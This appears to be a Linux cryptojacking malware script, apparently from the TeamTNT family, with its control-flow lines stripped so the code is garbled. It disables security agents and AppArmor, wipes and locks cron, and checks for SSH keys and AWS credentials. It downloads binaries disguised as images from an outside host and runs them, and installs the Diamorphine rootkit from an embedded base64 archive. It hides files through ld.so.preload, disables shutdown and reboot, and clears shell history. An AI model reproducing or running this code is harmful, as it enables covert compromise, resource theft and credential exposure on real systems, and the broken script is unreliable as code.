rm -rf /var/tmp/1.sh
rm -rf /var/tmp/conf.n
rm -r /var/tmp/lib
rm -r /var/tmp/.lib
chattr -iau /tmp/lok
chmod +700 /tmp/lok
rm -rf /tmp/lok
sleep 1
chattr -i /tmp/kdevtmpfsi
echo 1 > /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi
sleep 1
chattr -i /tmp/redis2
echo 1 > /tmp/redis2
chattr +i /tmp/redis2
chattr -ia /.Xll/xr
>/.Xll/xr
chattr +ia /.Xll/xr
chattr -ia /etc/trace
>/etc/trace
chattr +ia /etc/trace
chattr -ia /etc/newsvc.sh
chattr -ia /etc/svc*
chattr -ia /tmp/newsvc.sh
chattr -ia /tmp/svc*
>/etc/newsvc.sh
>/etc/svcupdate
>/etc/svcguard
>/etc/svcworkmanager
>/etc/svcupdates
>/tmp/newsvc.sh
>/tmp/svcupdate
>/tmp/svcguard
>/tmp/svcworkmanager
>/tmp/svcupdates
chattr +ia /etc/newsvc.sh
chattr +ia /etc/svc*
chattr +ia /tmp/newsvc.sh
chattr +ia /tmp/svc*
sleep 1
chattr -ia /etc/phpupdate
chattr -ia /etc/phpguard
chattr -ia /etc/networkmanager
chattr -ia /etc/newdat.sh
>/etc/phpupdate
>/etc/phpguard
>/etc/networkmanager
>/etc/newdat.sh
chattr +ia /etc/phpupdate
chattr +ia /etc/phpguard
chattr +ia /etc/networkmanager
chattr +ia /etc/newdat.sh
chattr -ia /etc/zzh
chattr -ia /etc/newinit
>/etc/zzh
>/etc/newinit
chattr +ia /etc/zzh
chattr +ia /etc/newinit
sleep 1
chattr -i /usr/lib/systemd/systemd-update-daily
echo 1 > /usr/lib/systemd/systemd-update-daily
chattr +i /usr/lib/systemd/systemd-update-daily
#yum install -y docker.io || apt-get install docker.io;
docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill %
docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f %
#echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
systemctl disable pnsd.service
systemctl disable apache4.service
systemctl stop pnsd.service
service stop pnsd.service
systemctl stop apache4.service
service stop apache4.service
sudo systemctl stop pastebin.service
sudo systemctl stop xvf.service
sudo systemctl daemon-reload
sudo systemctl stop xvf.service
sudo systemctl stop pastebin.service
sudo systemctl disable xvf.service
sudo systemctl disable pastebin.service
sudo systemctl disable c3pool_miner.service
sudo systemctl stop c3pool_miner.service
rm -rf /var/.httpd/*
rm -rf /etc/.httpd/*
rm -rf /var/tmp/.crypto/
rm -rf /var/tmp/.apache/*
rm -rf /usr/share/\[ddns\]*
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
chattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
kill_miner_proc
kill_sus_proc()
ps axf -o "pid"|while read procid
ls -l /proc/$procid/exe | grep /tmp
if [ $? -ne 1 ]
cat /proc/$procid/cmdline| grep -a -E "kswapd0"
if [ $? -ne 0 ]
kill -9 $procid
echo "don't kill"
ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
cat /proc/$procid/cmdline| grep -a -E "kswapd0"
if [ $? -ne 0 ]
kill -9 $procid
echo "don't kill"
kill_sus_proc
#FixTheSystem
function SetupNameServers(){
grep -q 8.8.8.8 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
grep -q 8.8.4.4 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
SetupNameServers
chattr -iR /var/spool/cron/
tntrecht -iR /var/spool/cron/
crontab -r
function clean_cron(){
chattr -R -ia /var/spool/cron
tntrecht -R -ia /var/spool/cron
chattr -ia /etc/crontab
tntrecht -ia /etc/crontab
chattr -R -ia /etc/cron.d
tntrecht -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
tntrecht -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
clean_cron
function lock_cron()
chattr -R +ia /var/spool/cron
tntrecht -R +ia /var/spool/cron
touch /etc/crontab
chattr +ia /etc/crontab
tntrecht +ia /etc/crontab
chattr -R +ia /var/spool/cron/crontabs
tntrecht -R +ia /var/spool/cron/crontabs
chattr -R +ia /etc/cron.d
tntrecht -R +ia /etc/cron.d
lock_cron
function CheckAboutSomeKeys(){
if [ -f "/root/.ssh/id_rsa" ]
echo 'found: /root/.ssh/id_rsa'
if [ -f "/home/*/.ssh/id_rsa" ]
echo 'found: /home/*/.ssh/id_rsa'
if [ -f "/root/.aws/credentials" ]
echo 'found: /root/.aws/credentials'
if [ -f "/home/*/.aws/credentials" ]
echo 'found: /home/*/.aws/credentials'
CheckAboutSomeKeys
echo 'MISSING: bioset'
loadthisfile http://oracle.zzhreceive.top/b/apa.jpg /usr/bin/bioset
chmod +x /usr/bin/bioset
cd /usr/bin && ./bioset
function hid(){
DIA_TAR='H4sIAHgF8GAAA+0ba3PbNjJfxV+BKomHVGRbshWljerMOLLi6PyQR7bb3ORyGJqEJFYSyeHDiZv6fvvtguAb8qtJmt5xP8QUsNhdLPaFRzY2TUtfOp47s2y2YTz6GtAC6HY6/C9A4e/W8/b2i0ftTuvF9osXW7y9vbXd7Twira8iTQFCP9A9Qh55jhPchHdb/98UHlu2sQhNRn5eWHb4adM3ZszcmL1Sih1LxwwXTNbjX/mGvlj4sj7T8pgdSEct9AtZ+yXzfMuxoYso0Dkhh8Pj83f0l8H4dDg6pv3R3oD8TA4G4+PBYdyqdpqkvd0kLS1DTveXm6FuGMyPJGO2aU1Wkny1U6QJ9NqtAs1IRNdzDGoLqgufyREmd2FbmslWk3SbZKtb5jqxhPqlLCdmoF/ECDezLM004tn+scwztC0/MAtEbZNNCKXHYzplgQnL6yuPoQniR76VtDvtzDhBuZ6NN7N6JObwlA6Od18fDvbU/uj4zXCfvvuxq5E//pD30G5HU0Lbt6Y2M8nCsafE8Fo9VI2U2O74CEdcOpZJ1EbomnrA6FJ3XcueUlisQFPd2ZVPddP0aEDwu0ny9C8tL2iSLJZv/c6gZYrjcRCS6RWkwtgSUM8Bhnqxz7KtgF6wqWX3Ev35zAjA+CnSziCQ9RylWKnQFlhGQdAGpeCQFD2ScpPorTR5mRd1ucXXgiuX4TKDE4ElzPUpi6irjYAKf9dUw7F90EPghQbMH6RjU580QAk1IVmCSxzPmiaGcStCt7MSZW4tFj3hAzIpLTsAIXPUKCxvoiPob8YicxunUYgijaZSq2XRcB53Y9DtlFgALQmTbgfYkPsxwQkjedcyKYguxhQmWNJvST6JgjPk87qNPLZgVgqMjZciMix6MVHRpTTls1IrYOcQgdd9bLAjgu4ElXJwMh69HtDD0ejg/CTVVZ6d2phjArpa+nThOPPQpba+ZKi1yESNGaT4Brah7uS4RNYM2GDUEAOZR+fg4RdMXZu7q4iQHaKuEITM3Q2MGz3UlJyk0HstpzokmZtrQ5NxUOt5n69rXPIg9GxSWArhOsVYFBCrpyi1ieMR1Spx5WbHWSwcn/WIBYnr/HB0vE+Pdt8Bq1rNIs92eEh0IqOAOKCRz+gGN04H0DjfGpiHmkN9z3MJ5/eB7BTHpcJoyF0+1dp1ooTj88PDRMXXiiKcM9D9ORXfDQVCMPgYNEXORlxh2zJkF6ZihB56dY+rjTLdmGEywYJDdaPJ46zc9VdACKfA6aXSuhIJQTRQtWL51LIvLd+CedxBGPwBxJDbD4KJoNrC+AK9IG1udlqMjg0FfGzH5vVXk4UOEX2NnLyhw+NfhqdDSKoZ5HZqZC0u+v0TjQjyxTQz0405MzPhakWuER+o7IeWETW0/YmJlolGHtNef2VaPUUWxEmDiA8YIu3PEPGtW6uSlQLgv+9bH76AFJxS+0MaY5AlrByMLaQFNdZokzDPi6NFPjMp5dXJpjSYizTDQvKjNPQZROKooank8i0xnBDmjza+WjykLUYL/ETQaGYJRX/meLwqM4BMq1eMeM5kItpX5Gn4apLGPGbWcD12CSMiN40HWbYDJW3DpPwDAxk6D4oOVXYr4yrwB3vnyZrNf4dA5RiI2yT7b05o5CKxXyaIEccyJZg0RiDHvaITz1lyxaqJtPFfQI4pwgCkMnUChzgh0rjrlgQ3Qj9FZaGYaBr7IEbAtgRMDPYf+M/7ifkB/lJcL+8KnCjWjEg7dybg6sFsQ0JF2C9MSDSuv7LwAzUFpUKfjkejM4hWI7K2Rn442v3HaJzF9Ex2iWrYbED3EaCVe5FSu7GJWMJ62qjwjzOQk6hoNz9zvfIAD4pGBxQZL161Z2hePRH/ISQjmbU1+K0u2dJYuurR7v6wT0/GgzfDd3y1cI6YyLnnLJidw9C4TC0NRYJYpqb0cnnCt5YuVGVAIHDChZqjikaE+1lNE2k5UiFKD7YYiS060NDI+k4slccMkIfn+BpIv3Qumcp9I540EnmWx04MDwACdwCuxfiva/wHPSnFxbqhxOqaROYSIROOge2ofQn+dc4fAifyhtgJ5nfxBvjnJfjnxGMsdqNMDcWd7ismuP/l9PYd5beHZLc75bY/m9m+UV77GlmtVqW1L5XW/qZ5jVSJ7W+f2HDKytS6ZBTvOdJjnXseW/+EvBMXCHHbm3rElP/E0JSisAIOkyH5BSRfhjQpYk0yaMJN4wBneBAuGzb7iB94XFaLvwEfFsbVPUb5b1WLzT3FSGOX0CKi3Oda4TlGHfIvJADeEx39mnHaPB/u7Q/36OnZeNg/o2f/PBnQ/ttB/+BUjAA/ufP1RXSSVkunx9dk41JfwDzTtmnSxlWawWYydLYa35fh+6vxJ9IBk+KIePny8yjOYYX8JdlXyF2SeZW8ZVlTOaNkDbFhubQCYUIxssYNMT2B4oWhZS/w4J/7X2CZV6nrRS579hYqq6PR3vnhAKRiRkD1IPA4rRVdSTpPmSSlgB/QGdPB9qPbPIpByHJCcIEYk1cXondmmZCqoslxAUU7IH1M5eRUddNU13ICYXOTFPig2BLicQBKu1hKv0ACRpT4bGBnT4hisoVEFBnn9gNrennBiKfnt9Txyp+o45NTQMzL/EexmMfaEkrBcqF9lyr9RvJppb6SR7EEv6m05ppKGPI7DSTK1RMfgq8+5fQ/WoExg00BjOCJ3dB9Rk6H+/yI8mVcAqjSY08tF77jLLg+OB3333Jfzx58/nsnd/LJ+y88ps97Ga6n5yeDMeeapk9Njgr2mJcxZ5AaybpXRAKVSLJeUaAMuUMPF5DgH3DFl8w+uftJtkdJXSvDwRVD3ad7k+svdQycDYYfPSvAJNyiE8czID8W7mP1heTeiUbI1IGK18PqFgwQyC2AOtSRMJ86lHnkaatJnj4F0nVoeUnqz7y6ivSa8LmsqzkimoZTigt0iZx474uxF0pIx0vD90P9/AELWdIUfKZLmPQmzbF/3hgPJJfkoBhXp/7V8sJZqNn7aFBc8XYm04t3obXsxXaTnOzuD8TOEPY1Gm7absqLof19Kpmskf+0PrVarTa+Y1qhcgnSd7UAWk+mfDzRwPcHSua1Bm9I83LxnQHEWukVcXLVVByQ2f2vt3sPfwhSQy3vwFZGN7nStduznUS52e2u9IZVMqYu3jokqi7db66gBarIjOJkMq897kwkHVPXMqcIxYTB60pt9dHITXafO6ZCydL3H8X1fJ97/fOh/ArhPsO7nYQApp27DEW8D4kTlgQvvgl5kPjldx/3nkb2VcctExHrWYp/uJYl/yvIX7ai4qFz7zYaIPztVPhTkhvmsZpC9NxEqckml6snRFTi3kkp+1QIS8aC6XboZt+ifBl9FR/VPERb5Wc399NV5mGOTFOgHeHtPDgXozVgiG7UmirRGqom2ifRw2F/cHw6UOt7IWy9X5/ube6fHGJgEf2752dvR2O1vmzZuplp3xuc9sfDkzOMHPXDgyOCNfDc4tHxr37eWsEtsJF7/z37Kjxufv/dam+1tkrvv59X77+/CchuiT4rREB+d0UIv1Po3dDN7wdK3dGpEkkPtmMM/jAvA9GpPj9HuMZ6RTyLzd4Z5B4QUyhrIVXUU9Tshp20PrWFjWVoRUHrePdokCMFNJgdLvFEIT5LgHC83W7y33yXD7+7neh3vJXHpu1mJKx4GZ1WnQnPTCHquFiG41muGh/8QkqzMRGYlDx+TGIEKHlvQsAvccClafd/3P68+aKJjyyFgLlXlqRdegcePVTkD9rzR4pRB/wBRYDmcA03og1K/CKyLite66gxIfRf7QH/37CxeaTPGV5Wfj0et8T/1taLbiH+t7efd6v4/y3AufhtfUle4tVjWgY4Sr+P23nDIOu/4tN75WBvOEaszYV1If4rkL/5RPVnDHpD7urrnrZ5EVoLUzn5dQ9x4273I5TlCpB5qdSeqEe7BwONrPehG4lq5GjniQoj4uNPX1F4aXoLMsepYkcFFVRQQQUVVFBBBRVUUEEFFVRQQQUVVFBBBRVUUEEJ/gv14/jOAFAAAA=='
CHECK_WHOAMI=`whoami`
function old_school_hide(){
echo "bash hide"
function setup_dia(){
chattr -ia / /etc/ /tmp/ /var/ /var/tmp/ 2>/dev/null
chattr -R -ia /tmp/ /var/tmp/ 2>/dev/null
chmod 1777 /tmp/ /var/tmp/ 2>/dev/null
if type yum 2>/dev/null 1>/dev/null; then yum clean all ; yum -y install gcc make kmod ; yum -y install epel-release ;yum -y install elfutils-libelf-devel; yum list|grep kernel-devel|awk '{print $1}'|xargs yum -y install; fi
if type apt 2>/dev/null 1>/dev/null; then apt update --fix-missing ; apt-get -y install gcc make kmod ; apt-get -y install elfutils-libelf-devel;apt-get -y install linux-headers-$(uname -r) ; fi
if type apk 2>/dev/null 1>/dev/null; then apk update 2>/dev/null 1>/dev/null; apk add linux-headers 2>/dev/null ; fi
if [ ! -d "/var/tmp/.../dia/" ]; then mkdir -p /var/tmp/.../dia/ ; fi
echo $DIA_TAR | base64 -d > /var/tmp/.../dia/dia.tar.gz
tar xvf /var/tmp/.../dia/dia.tar.gz -C /var/tmp/.../dia/
rm -f /var/tmp/.../dia/dia.tar.gz
cd /var/tmp/.../dia/
kdir=/usr/src/kernels/$(uname -r)/
test -d /lib/modules/$(uname -r)/build
if [ $? -ne 0 ]
echo "build directory not exist,try to create soft link to /usr/src/kernels/"
test -d $kdir
if [ $? -ne 0 ]
echo "uname -r result is not eqel exist kernel version,try to link other version "
for kdir in $(ls -lrt /usr/src/kernels/|grep -v total|awk '{print $NF}')
cd /lib/modules/$(uname -r)/ && rm -rf build && ln -s /usr/src/kernels/$kdir/ ./build
cd /var/tmp/.../dia && make
cd /lib/modules/$(uname -r)/ && rm -rf build && ln -s /usr/src/kernels/$kdir/ ./build
cd /var/tmp/.../dia && make
echo "build directory exist ,eqel kernel version"
cd /var/tmp/.../dia && make
if [ -f "/var/tmp/.../dia/diamorphine.ko" ]; then
insmod diamorphine.ko
ROOTMO=`ps aux | grep -v grep | grep '/var/tmp/.copydie/\[kswapd0\].pid' | awk '{print $2}')`
if [ ! -z "$ROOTMO" ]; then kill -31 $ROOTMO ; fi
else echo 'build dia fail!'
old_school_hide
if [ "$CHECK_WHOAMI" = "root" ]; then setup_dia ; fi
history -c
clear
function loadthisfile(){
GETFROM=$1
PUTITTO=$2
if [ -f "$PUTITTO" ]; then mchattr -i $PUTITTO 2>/dev/null 1>/dev/null ; chattr -i $PUTITTO 2>/dev/null 1>/dev/null ; tntrecht -i $PUTITTO 2>/dev/null 1>/dev/null ; rm -f $PUTITTO 2>/dev/null 1>/dev/null ; fi
curl -L --progress-bar $GETFROM -o $PUTITTO || cur -L --progress-bar $GETFROM -o $PUTITTO || cdl -L --progress-bar $GETFROM -o $PUTITTO || wget $GETFROM -O $PUTITTO || wge $GETFROM -O $PUTITTO || wdl $GETFROM -O $PUTITTO
function SecureTheSystem(){
if [ -f /usr/local/lib/kswapd0.so ]
echo "hide file exist" 2>/dev/null 1>/dev/null
grep kswapd0.so /etc/ld.so.preload
if [ $? != 0 ]
chattr -ia /etc/ld.so.preload|| tntrecht -ia /etc/ld.so.preload
echo -e "/usr/local/lib/pscan.so\n/usr/local/lib/bioset.so\n/usr/local/lib/mscan.so\n/usr/local/lib/kswapd0.so\n/usr/local/lib/zrab.so" >/etc/ld.so.preload
chattr +ia /etc/ld.so.preload|| tntrecht +ia /etc/ld.so.preload
echo "hided"
grep kswapd0.so /etc/ld.so.preload
if [ $? != 0 ]
chattr -ia /etc/ld.so.preload|| tntrecht -ia /etc/ld.so.preload
echo -e "/usr/local/lib/pscan.so\n/usr/local/lib/bioset.so\n/usr/local/lib/mscan.so\n/usr/local/lib/kswapd0.so\n/usr/local/lib/zrab.so" >/etc/ld.so.preload
chattr +ia /etc/ld.so.preload|| tntrecht +ia /etc/ld.so.preload
echo "hided"
loadthisfile http://oracle.zzhreceive.top/hide/hide.jpg /tmp/hide.tar && tar -xf /tmp/hide.tar -C /usr/local/lib/ && rm -f /tmp/hide.tar
chattr +ia /usr/local/lib/pscan.so || tntrecht +ia /usr/local/lib/pscan.so
chattr +ia /usr/local/lib/mscan.so || tntrecht +ia /usr/local/lib/mscan.so
chattr +ia /usr/local/lib/bioset.so || tntrecht +ia /usr/local/lib/bioset.so
chattr +ia /usr/local/lib/kswapd0.so || tntrecht +ia /usr/local/lib/kswapd0.so
chattr +ia /usr/local/lib/zrab.so || tntrecht +ia /usr/local/lib/zrab.so
function LockDownTheSystem(){
LOCKDOWNARRAY=(shutdown reboot poweroff telinit)
for LOCKDOWN in ${LOCKDOWNARRAY[@]}; do
LOCKDOWNBIN=`which $LOCKDOWN` 2>/dev/null 1>/dev/null
chattr -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
tntrecht -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr -x $LOCKDOWNBIN 2>/dev/null 1>/dev/null
#chmod 000 $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
tntrecht +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null
tntrecht +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null
LOCKDOWNFILES=("/lib/systemd/system/reboot.target" "/lib/systemd/system/systemd-reboot.service")
for LOCKDOWNFILE in ${LOCKDOWNFILES[@]}; do
chattr -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null
tntrecht -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null
chattr -x $LOCKDOWNFILE 2>/dev/null 1>/dev/null
> $LOCKDOWNFILE
rm -f $LOCKDOWNFILE 2>/dev/null 1>/dev/null
function KILLMININGSERVICES(){
echo "[*] Removing previous miner (if any)"
killall -9 xmrig
echo "do KILLMININGSERVICES"
$(docker rm $(docker ps | grep -v grep | grep "/bin/bash -c 'apt" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
#$(docker rm $(docker ps | grep -v grep | grep "/bin/bash" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "/root/startup.sh" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "widoc26117/xmr" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "zbrtgwlxz" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "tail -f /dev/null" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
rm -f /usr/bin/docker-update 2>/dev/null 1>/dev/null
pkill -f /usr/bin/docker-update 2>/dev/null 1>/dev/null
killall -9 docker-update 2>/dev/null 1>/dev/null
rm -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null
pkill -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null
killall -9 redis-backup 2>/dev/null 1>/dev/null
rm -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
pkill -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
rm -fr /tmp/moneroocean/ 2>/dev/null 1>/dev/null
killall -9 xmrig 2>/dev/null 1>/dev/null
LOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='
if [ ! -f /usr/bin/tntrecht ]; then
chattrbin=`which chattr`
cp $chattrbin /usr/bin/tntrecht 2>/dev/null 1>/dev/null
chmod +x /usr/bin/tntrecht 2>/dev/null 1>/dev/null
chmod -x $chattrbin 2>/dev/null 1>/dev/null
tntrecht +i $chattrbin 2>/dev/null 1>/dev/null
LOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='
if [ -f /root/.tmp/xmrig ]; then
chattr -iR /root/.tmp/ 2>/dev/null 1>/dev/null
tntrecht -iR /root/.tmp/ 2>/dev/null 1>/dev/null
tmpxmrig=("/root/.tmp/config.json" "/root/.tmp/config_background.json" "/root/.tmp/xmrig.log" "/root/.tmp/miner.sh" "/root/.tmp/xmrig")
for tmpxmrigfile in ${tmpxmrig[@]}; do
rm -f $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
echo $LOCKFILE | base64 -d > $tmpxmrigfile
chmod +x $tmpxmrigfile 2>/dev/null 1>/dev/null
chattr +i $tmpxmrigfile 2>/dev/null 1>/dev/null
tntrecht +i $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
killall $tmpxmrigfile 2>/dev/null 1>/dev/null
chmod -x /root/.tmp/xmrig 2>/dev/null 1>/dev/null
rm -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null
chattr +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null
tntrecht +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null
pkill -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null
ps ax| grep xmrig 2>/dev/null 1>/dev/null
if [ -f /usr/sbin/cpumon ]; then
cpumonxmr=("/usr/sbin/cpumon" "/usr/cpu")
for cpumonfile in ${cpumonxmr[@]}; do
chattr -i $cpumonfile 2>/dev/null 1>/dev/null
tntrecht -i $cpumonfile 2>/dev/null 1>/dev/null
rm -f $cpumonfile 2>/dev/null 1>/dev/null
pkill -f $cpumonfile 2>/dev/null 1>/dev/null
kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null
echo $LOCKFILE | base64 -d > $cpumonfile
chmod +x $cpumonfile 2>/dev/null 1>/dev/null
chattr +i $cpumonfile 2>/dev/null 1>/dev/null
tntrecht +i $cpumonfile 2>/dev/null 1>/dev/null
pkill -f $cpumonfile 2>/dev/null 1>/dev/null
kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null
killall $cpumonfile 2>/dev/null 1>/dev/null
if [ -f /opt/server ]; then
chattr -i /opt/server 2>/dev/null 1>/dev/null
tntrecht -i /opt/server 2>/dev/null 1>/dev/null
rm -f /opt/server 2>/dev/null 1>/dev/null
pkill -f /opt/server 2>/dev/null 1>/dev/null
kill $(pidof /opt/server) 2>/dev/null 1>/dev/null
if [ -f /tmp/log_rotari ]; then
chattr -i /tmp/log_rotari 2>/dev/null 1>/dev/null
tntrecht -i /tmp/log_rotari 2>/dev/null 1>/dev/null
rm -f /tmp/log_rotari 2>/dev/null 1>/dev/null
pkill -f /tmp/log_rotari 2>/dev/null 1>/dev/null
kill $(pidof /tmp/log_rotari) 2>/dev/null 1>/dev/null
BASH00=$(ps ax | grep -v grep | grep "/root/.tmp00/bash")
if [ ! -z "$BASH00" ];
chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null
tntrecht -i /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null
echo " " > /var/spool/cron/root 2>/dev/null 1>/dev/null
rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null
chattr -i /root/.tmp00/bash 2>/dev/null 1>/dev/null
tntrecht -i /root/.tmp00/bash 2>/dev/null 1>/dev/null
chmod -x /root/.tmp00/bash 2>/dev/null 1>/dev/null
pkill -f /root/.tmp00/bash 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/root/.tmp00/bash" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /root/.tmp00/bash) 2>/dev/null 1>/dev/null
echo " " > /root/.tmp00/bash 2>/dev/null 1>/dev/null
rm -f /root/.tmp00/bash 2>/dev/null 1>/dev/null
echo $StringToLock > /root/.tmp00/bash
chattr +i /root/.tmp00/bash 2>/dev/null 1>/dev/null
tntrecht +i /root/.tmp00/bash 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
BASH6400=$(ps ax | grep -v grep | grep "/root/.tmp00/bash64")
if [ ! -z "$BASH6400" ];
chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null
tntrecht -i /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null
echo " " > /var/spool/cron/root 2>/dev/null 1>/dev/null
rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null
chattr -i /root/.tmp00/bash64 2>/dev/null 1>/dev/null
tntrecht -i /root/.tmp00/bash64 2>/dev/null 1>/dev/null
chmod -x /root/.tmp00/bash64 2>/dev/null 1>/dev/null
pkill -f /root/.tmp00/bash64 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/root/.tmp00/bash64" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /root/.tmp00/bash64) 2>/dev/null 1>/dev/null
echo " " > /root/.tmp00/bash64 2>/dev/null 1>/dev/null
rm -f /root/.tmp00/bash64 2>/dev/null 1>/dev/null
echo $StringToLock > /root/.tmp00/bash64
chattr +i /root/.tmp00/bash64 2>/dev/null 1>/dev/null
tntrecht +i /root/.tmp00/bash64 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
KINSING1=$(ps ax | grep -v grep | grep "/var/tmp/kinsing")
if [ ! -z "$KINSING1" ];
chattr -i /var/tmp/kinsing 2>/dev/null 1>/dev/null
tntrecht -i /var/tmp/kinsing 2>/dev/null 1>/dev/null
chmod -x /var/tmp/kinsing 2>/dev/null 1>/dev/null
pkill -f /var/tmp/kinsing 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/var/tmp/kinsing" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /var/tmp/kinsing) 2>/dev/null 1>/dev/null
echo " " > /var/tmp/kinsing 2>/dev/null 1>/dev/null
rm -f /var/tmp/kinsing 2>/dev/null 1>/dev/null
echo $StringToLock > /var/tmp/kinsing
chattr +i /var/tmp/kinsing 2>/dev/null 1>/dev/null
tntrecht +i /var/tmp/kinsing 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
KINSING2=$(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi")
if [ ! -z "$KINSING2" ];
chattr -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
tntrecht -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
chmod -x /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
pkill -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
